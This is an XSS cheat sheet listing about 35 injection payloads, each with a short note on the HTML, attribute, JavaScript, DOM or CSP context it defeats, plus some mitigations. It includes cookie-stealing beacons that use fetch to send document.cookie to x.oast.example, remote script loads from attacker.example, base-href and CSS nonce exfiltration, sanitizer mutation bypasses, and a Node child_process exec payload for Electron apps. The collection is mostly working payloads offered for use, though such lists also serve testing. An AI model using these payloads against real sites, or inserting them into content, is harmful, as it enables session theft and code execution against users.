Cross-Site Scripting (XSS) Cheat Sheet

<img src=x onerror=alert(1)>

A broken image src forces the browser to fire the onerror handler — minimal markup that survives allow-lists which strip <script> but allow common HTML tags with event attributes.

<svg onload=alert(1)>

Works wherever <script> is filtered but SVG is not, because the SVG namespace expands the allowed handler set. Fires automatically when the SVG node is rendered.

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

<animate>'s onbegin fires without user interaction in Chrome, Firefox and Safari; useful when onload is filtered but animation events are not.

<body onpageshow=alert(1)>

onpageshow fires on every navigation, including bfcache restores, with no user interaction — slips past filters that focus on onload / onerror but forget the broader event surface.

vXSS-7c9f<>"'/

Diagnostic, not weaponised: send a unique marker plus the four metacharacters (< > " ') and diff which survive un-encoded. The surviving set tells you which context-specific payload is needed.

<img src=x onerror="fetch('https://x.oast.example/?c='+document.cookie)">

Once stored and rendered to another session, the onerror handler beacons the victim's cookies to the attacker host. If HttpOnly is set, cookies aren't reachable — a reminder of why HttpOnly matters.

<script src="https://x.oast.example/p.js"></script>

Used when the rendered context (admin back-office, support ticket viewer) is not visible to the attacker; the external script reports back via the OAST host with DOM, URL and storage snapshots.

"><img src=x onerror=alert(1)>

Stored as user-supplied JSON value, then later interpolated into innerHTML by a client-side renderer; payload escapes the attribute and lands in a DOM sink. Pattern matches the CI4MS CVE-2026-34565 family.

[click](javascript:alert(1))

Markdown renderers that emit <a href="…"> without scheme allow-listing turn javascript: links into one-click XSS for any later viewer; classic stored vector against rich-text features.

<img src=x onerror="require('child_process').exec('calc')">

When a desktop app renders user content with Node integration enabled, stored XSS escalates to arbitrary command execution because the renderer process exposes require(). The Notesnook CVE-2026-42090 chain matches this shape.

http://victim/page#<img src=x onerror=alert(1)>

Client code reads location.hash and assigns it to el.innerHTML. The fragment never reaches the server, so server-side WAFs and logs are blind — only DOM-aware tooling sees it.

window.opener.postMessage('<svg onload=alert(1)>','*')

An attacker page calls postMessage to a victim window that doesn't validate event.origin, dropping HTML into a document.write sink. Always allow-list origins and validate message shape.

javascript:alert(1)

Some analytics shims read document.referrer and assign it to an iframe or script src; a javascript: scheme in the referrer fires when the assignment happens. Mitigate by scheme allow-listing.

alert(1)//

Apps that JSON.parse a user-influenced localStorage value and then eval the result trust client storage as if it were code. localStorage is mutable by any same-origin script — including XSS in unrelated paths.

{ html: '<img src=x onerror=alert(1)>' }

Real-time collaboration platforms accept postMessage payloads with html fields and route them into innerHTML for in-app chat / sharing — exactly the CVE-2026-27246 shape on Adobe Connect 2025.3 / 12.10.

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

The sanitiser sees a benign title attribute on <p>. The browser, re-parsing the serialised output with a different content model inside <noscript>, treats the </noscript> as a real end tag and exposes the <img> — classic Cure53 mXSS.

<form><math><mtext></form><form><mglyph><style></math><img src=x onerror=alert(1)>

Foreign-content namespace (MathML / SVG) confuses the serialiser-then-reparser pipeline; CVE-2025-15599 and CVE-2026-0540 cover this class for DOMPurify 3.1.3–3.2.6 and 2.5.3–2.5.8. Pin ≥ 3.2.7 / 2.5.9.

<a href="javascript:alert(1)">x</a>

After DOMPurify cleans the input, application code that resets href via setAttribute or string concat reintroduces the dangerous scheme. OWASP's rule: never mutate sanitiser output before insertion.

<style><style/><img src=x onerror=alert(1)>

<style> raw-text content model lets a malformed second <style/> token resync the parser into HTML mode, exposing the <img>. Survives sanitisers that allow-list <style> for trusted CSS.

" autofocus onfocus=alert(1) x="

Closes the existing attribute value, adds an autofocus attribute that self-triggers onfocus without user interaction, and reopens a benign attribute so the rest of the tag still parses.

 onmouseover=alert(1) //

Lands inside an unquoted attribute (a common framework slip). The leading space terminates the previous attribute value, the new event handler is parsed as legal HTML, and // comments out trailing junk.

alert(1)

Application code calls el.setAttribute('onclick', userInput); the browser registers the handler exactly like a static one. The fix is never to call setAttribute on event-handler names with user input.

" autofocus onfocus=alert(1) x="

HTML entities decode at parse time, so &#x22; becomes a literal double-quote and the alert call appears post-decode — useful when application code HTML-escapes < and > but forgets to encode quotes for attribute context.

';alert(1);//

Closes the existing JS single-quoted string, runs alert, and comments out the trailing ' so the script still parses cleanly. The canonical JS-string context payload.

${alert(1)}

Inside a JS template literal, ${...} is evaluated as an expression. Any reflection of user input into a backtick-delimited string is therefore live-eval, not data.

\';alert(1);//

When the application escapes ' as \', appending another \ bypasses the escape: the trailing \\' becomes \\ (escaped backslash) followed by an unescaped quote, closing the string.

</script><svg onload=alert(1)>

When user data is JSON-stringified into an inline <script>, < and > are not escaped by JSON.stringify. A literal </script> closes the script element and the SVG fires in HTML context.

<base href="//attacker.example/">

Without an explicit base-uri directive, an attacker-injected <base> rewrites the resolution of every relative <script src> on the page, redirecting them to an attacker host — even under a strict CSP.

<script src="https://allowed.cdn/jsonp?callback=alert(1)//"></script>

Mature CDNs almost all host a JSONP or polyfill endpoint that reflects the callback parameter as an executable identifier; allow-listing the CDN in script-src effectively allows arbitrary JS.

<script nonce="…">var s=document.createElement('script');s.src='//attacker.example/p.js';document.body.appendChild(s);</script>

Once an attacker has any execution under a valid nonce — e.g. via a stored DOM sink that copies a legitimate nonce — strict-dynamic lets that script create children freely. The fix is preventing the initial execution, not relying on strict-dynamic.

script[nonce^="ab"]{background:url(//attacker.example/?ab)}

CSS attribute selectors plus a side channel (URL request) leak the nonce one prefix at a time. Mitigation is not exposing the nonce as a readable attribute — use the IDL property and clear the attribute, as Chrome already does for browser-set nonces.

<iframe src="https://attacker.example/tt.html"></iframe>

Network-served iframes do not inherit Trusted-Types from the parent's CSP. The attacker iframe creates its own permissive trustedTypes.createPolicy and operates outside the parent restrictions — the spec explicitly warns about this collusion.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e

Single string designed to escape HTML body, attributes, JS strings, comments and href contexts; useful for one-shot fuzzing across many sinks. Per-context payloads above are more diagnostic for confirmation.

<a href="javascript:alert(1)">x</a>

Any sink that takes a navigation URL without scheme allow-listing fires JS on click. Mitigation is allow-listing https: and relative URLs only.

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

data: URIs carrying HTML execute in the embedding origin in older renderers and as a unique opaque origin in modern browsers — still useful for phishing chains and embedded content sinks.

<x-y><template shadowroot=open><slot></slot></template><span slot=s>x</span></x-y>

Declarative shadow DOM lets attacker markup register an onslotchange handler in a custom element, firing without obvious script tags — covered in PortSwigger’s 2024–2025 cheat-sheet additions.